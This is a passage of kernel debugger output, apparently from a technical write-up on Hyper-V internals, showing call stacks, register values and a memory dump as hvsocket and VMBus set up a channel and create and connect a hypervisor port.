<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">19 vmbusr!PipeStartChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1a vmbusr!PipeOffer</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b hvsocket!VmbusTlXPartRootSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1c hvsocket!VmbusTlSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1d hvsocket!VmbusTlXPartAcceptConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1e hvsocket!VmbusTlListenerProcessPendingIncomingConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1f hvsocket!VmbusTlProcessNewConnectionForListener</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">20 hvsocket!VmbusTlProcessNewConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">21 hvsocket!VmbusTlProcessConnectRequestWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">22 hvsocket!VmbusTlConnectRequestWorkQueueRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">23 NETIO!NetiopIoWorkItemRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">24 nt!IopProcessWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">25 nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">26 nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">27 nt!KiStartSystemThread</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dc @r8 @r8+@r9 – the message (r8 is the buffer address, r9 its length):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7f30 00000001 00000000 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ........>.....pE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7f40 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">487662ad 1b7a9d77</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0ec85988 11e74d2f .bvHw.z..Y../M..</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7f50 0c00d483 01cf5129 00000000 00000000 ....)Q..........</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7f60 00000000 00000000 00002011 00000000 ......... ......</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7f70 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7f80 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7f90 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7fa0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7fb0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7fc0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7fd0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7fe0 00000000 00000000 0000000b 000100ff ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7ff0 0001000b 004e0079</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The port is also created:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">********** Bp winhvr!WinHvCreatePort ********</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx=0000000080000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8=000000000000002d</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r9=0000000000000004</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 winhvr!WinHvCreatePort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 vmbusr!ParentClaimInterruptResources</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 vmbusr!XPartCreateInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 vmbusr!ChpInitializeServerChannelLocked</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 vmbusr!ChOfferChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 vmbusr!RootIoctlChannelOffered</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 vmbusr!RootIoctlDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 vmbusr!RootDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">……. WDF stuff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">11 vmbusr!RootIoctlDeviceControlPreprocess</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">……. WDF stuff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">16 vmbkmclr!KmclpSynchronousIoControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">17 vmbkmclr!KmclpServerOfferChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">18 vmbkmclr!VmbChannelEnable</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">19 vmbusr!PipeStartChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1a vmbusr!PipeOffer</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b hvsocket!VmbusTlXPartRootSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1c hvsocket!VmbusTlSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1d hvsocket!VmbusTlXPartAcceptConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1e hvsocket!VmbusTlListenerProcessPendingIncomingConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1f hvsocket!VmbusTlProcessNewConnectionForListener</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">20 hvsocket!VmbusTlProcessNewConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">21 hvsocket!VmbusTlProcessConnectRequestWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">22 hvsocket!VmbusTlConnectRequestWorkQueueRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">23 NETIO!NetiopIoWorkItemRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">24 nt!IopProcessWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">25 nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">26 nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">27 nt!KiStartSystemThread</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">And the connection to it is established:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">********** Bp winhvr!WinHvConnectPort ********</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000004</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx=0000000080000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8=000000000001000c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r9=0000000000000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 winhvr!WinHvConnectPort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 vmbusr!ParentConnectDedicatedInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 vmbusr!ParentClaimInterruptResources</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 vmbusr!XPartCreateInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 vmbusr!ChpInitializeServerChannelLocked</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 vmbusr!ChOfferChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 vmbusr!RootIoctlChannelOffered</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 vmbusr!RootIoctlDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 vmbusr!RootDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………. WDF stuff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">12 vmbusr!RootIoctlDeviceControlPreprocess</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………. WDF stuff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">17 vmbkmclr!KmclpSynchronousIoControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">18 vmbkmclr!KmclpServerOfferChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">19 vmbkmclr!VmbChannelEnable</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1a vmbusr!PipeStartChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b vmbusr!PipeOffer</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1c hvsocket!VmbusTlXPartRootSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1d hvsocket!VmbusTlSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1e hvsocket!VmbusTlXPartAcceptConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1f hvsocket!VmbusTlListenerProcessPendingIncomingConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">20 hvsocket!VmbusTlProcessNewConnectionForListener</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">21 hvsocket!VmbusTlProcessNewConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">22 hvsocket!VmbusTlProcessConnectRequestWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">23 hvsocket!VmbusTlConnectRequestWorkQueueRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">24 NETIO!NetiopIoWorkItemRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">25 nt!IopProcessWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">26 nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
